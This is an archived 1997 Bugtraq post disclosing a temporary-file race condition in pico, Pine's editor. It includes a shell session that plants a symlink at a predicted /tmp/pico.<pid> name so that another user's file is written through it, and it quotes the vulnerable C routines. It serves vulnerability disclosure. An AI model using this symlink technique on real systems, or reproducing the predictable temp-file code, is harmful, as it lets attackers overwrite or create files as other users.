Bugtraq mailing list archives

Pine has a few more problems...

From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 2 Sep 1997 01:23:52 -0400


Hey all,

        Since youre discussing pine, and its problems, here is something i
found while reading through the source for pico, the editor in pine.  It
seems that there is a race condition here in the routines it uses to make
temporary files.

Cheers,
dynamo

ps: floydy, get to bed. you shouldnt be working at this hour.


here's the problem in action:

bring# ps axO user | grep pico
10420 notlumpy  p4  I+     0:00.04 pico
10366 lumpy     p5  I+     0:00.03 pico -w blahblah
bring# ln -s mark.sucks pico.10420
bring# ls -l
total 561
-rw-r--r--  1 lumpy  wheel  562100 Sep  1 19:34 L74874TMP.gz
lrwxrwxrwt  1 root   wheel      10 Sep  2 01:20 pico.10420 -> mark.sucks
drwxr-xr-x  3 root   wheel     512 Aug 30 21:38 screens

(at this point in another window i did a spell check,
        one function that calls writetmp)


bring# ls -l
total 562
-rw-r--r--  1 lumpy     wheel  562100 Sep  1 19:34 L74874TMP.gz
-rw-------  1 notlumpy  wheel      60 Sep  2 01:20 mark.sucks
drwxr-xr-x  3 root      wheel     512 Aug 30 21:38 screens
bring#

here are some code snippets:

os_unix.c ffwopen
-----------------
/*
 * Open a file for writing. Return TRUE if all is well, and FALSE on error
 * (cannot create).
 */
ffwopen(fn)
char    *fn;
{
    extern FILE *ffp;

    if ((ffp=fopen(fn, "w")) == NULL) {
        emlwrite("Cannot open file for writing", NULL);
        return (FIOERR);
    }
-----------------

os_unix.c tmpname
-----------------

/*
 * tmpname - return a temporary file name in the given buffer
 */
void
tmpname(name)
char *name;
{
    sprintf(name, "/tmp/pico.%d", getpid());    /* tmp file name */
}
-----------------

file.c writetmp
-----------------

 * writetmp - write a temporary file for message text, mindful of
 *            access restrictions and included text.  If n is true, include
 *            lines that indicated included message text, otw forget them
 */
char *writetmp(f, n)
int f, n;
{
        static   char   fn[NFILEN];
        register int    s;
        register LINE   *lp;
        register int    nline;

        tmpname(fn);

        if ((s=ffwopen(fn)) != FIOSUC)          /* Open writes message. */
                return(NULL);
(code continues...)
-----------------

Current thread:

in.comsat DoS vulnerability, (continued)
- - in.comsat DoS vulnerability Andrew Hobgood (Sep 02)
  - You can find jizz.c here T o r g (Sep 03)
  - You can find jizz.c here anonymous () ANONYMOUS ORG (Sep 03)
  - [linux-security] Announce: chkexploit 1.13 (fwd) iON BARRiER (Sep 04)
    - Re: [linux-security] Announce: chkexploit 1.13 (fwd) W.C. Epperson (Sep 04)
    - [Alert] Website's uploader.exe (from demo) vulnerable Aleph One (Sep 04)
    - Overflow in one of Apache 1.1.1 (maybe later too)'s modules Matt Conover (Sep 04)
    - Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Artur Pydo - EuroBretagne (Sep 05)
    - Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Marc Slemko (Sep 05)
- Announcement: Phrack 51 Nate (Sep 01)
- Pine has a few more problems... dynamo () IME NET (Sep 01)
- SNI-18: Vacation Vulnerability Secure Networks Inc. (Sep 01)
- SNI-18: Vacation Vulnerability ggajic () FREENET NETHER NET (Sep 02)